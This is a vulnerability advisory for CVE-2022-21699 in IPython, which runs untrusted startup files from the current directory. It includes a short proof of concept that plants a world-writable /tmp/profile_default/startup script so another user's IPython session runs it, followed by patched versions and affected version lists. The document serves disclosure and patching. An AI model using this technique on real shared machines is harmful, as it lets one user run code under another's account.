GHSA-pq7m-3gw7-gq5x

Source

https://github.com/advisories/GHSA-pq7m-3gw7-gq5x

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-pq7m-3gw7-gq5x/GHSA-pq7m-3gw7-gq5x.json

JSON Data

https://api.test.osv.dev/v1/vulns/GHSA-pq7m-3gw7-gq5x

Aliases

Published

2022-01-21T18:55:30Z

Modified

2024-09-27T18:52:53.914048Z

Severity

8.2 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H CVSS Calculator
8.5 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P CVSS Calculator

Summary

Execution with Unnecessary Privileges in ipython

Details

We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted files in CWD. This vulnerability allows one user to run code as another.

Proof of concept

User1:

mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py

User2:

cd /tmp
ipython

User2 will see:

Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets

Patched release and documentation

See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699,

Version 8.0.1, 7.31.1 for current Python version are recommended. Version 7.16.3 has also been published for Python 3.6 users, Version 5.11 (source only, 5.x branch on github) for older Python versions.

Database specific

{
    "nvd_published_at": "2022-01-19T22:15:00Z",
    "cwe_ids": [
        "CWE-250",
        "CWE-269",
        "CWE-279"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2022-01-19T21:26:17Z"
}

References

Affected packages

PyPI / ipython

Package

Name: ipython; View open source insights on deps.dev
Purl: pkg:pypi/ipython

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

5.11

Affected versions

0.*

0.7.1.fix1

0.7.4.svn.r2010

0.6.4

0.6.5

0.6.6

0.6.7

0.6.8

0.6.9

0.6.10

0.6.11

0.6.12

0.6.13

0.6.14

0.6.15

0.7.0

0.7.1

0.7.2

0.7.3

0.8.0

0.8.1

0.8.2

0.8.3

0.8.4

0.9

0.9.1

0.10

0.10.1

0.10.2

0.11

0.12

0.12.1

0.13

0.13.1

0.13.2

1.*

1.0.0

1.1.0

1.2.0

1.2.1

2.*

2.0.0

2.1.0

2.2.0

2.3.0

2.3.1

2.4.0

2.4.1

3.*

3.0.0

3.1.0

3.2.0

3.2.1

3.2.2

3.2.3

4.*

4.0.0-b1

4.0.0b1

4.0.0

4.0.1

4.0.2

4.0.3

4.1.0rc1

4.1.0rc2

4.1.0

4.1.1

4.1.2

4.2.0

4.2.1

5.*

5.0.0b1

5.0.0b2

5.0.0b3

5.0.0b4

5.0.0rc1

5.0.0

5.1.0

5.2.0

5.2.1

5.2.2

5.3.0

5.4.0

5.4.1

5.5.0

5.6.0

5.7.0

5.8.0

5.9.0

5.10.0

PyPI / ipython

Package

Name: ipython; View open source insights on deps.dev
Purl: pkg:pypi/ipython

Affected ranges

Type: ECOSYSTEM
Events: Introduced

6.0.0

Fixed

7.16.3

Affected versions

6.*

6.0.0

6.1.0

6.2.0

6.2.1

6.3.0

6.3.1

6.4.0

6.5.0

7.*

7.0.0b1

7.0.0rc1

7.0.0

7.0.1

7.1.0

7.1.1

7.2.0

7.3.0

7.4.0

7.5.0

7.6.0

7.6.1

7.7.0

7.8.0

7.9.0

7.10.0

7.10.1

7.10.2

7.11.0

7.11.1

7.12.0

7.13.0

7.14.0

7.15.0

7.16.0

7.16.1

7.16.2

PyPI / ipython

Package

Name: ipython; View open source insights on deps.dev
Purl: pkg:pypi/ipython

Affected ranges

Type: ECOSYSTEM
Events: Introduced

7.17.0

Fixed

7.31.1

Affected versions

7.*

7.17.0

7.18.0

7.18.1

7.19.0

7.20.0

7.21.0

7.22.0

7.23.0

7.23.1

7.24.0

7.24.1

7.25.0

7.26.0

7.27.0

7.28.0

7.29.0

7.30.0

7.30.1

7.31.0

PyPI / ipython

Package

Name: ipython; View open source insights on deps.dev
Purl: pkg:pypi/ipython

Affected ranges

Type: ECOSYSTEM
Events: Introduced

8.0.0

Fixed

8.0.1

Affected versions

8.*

8.0.0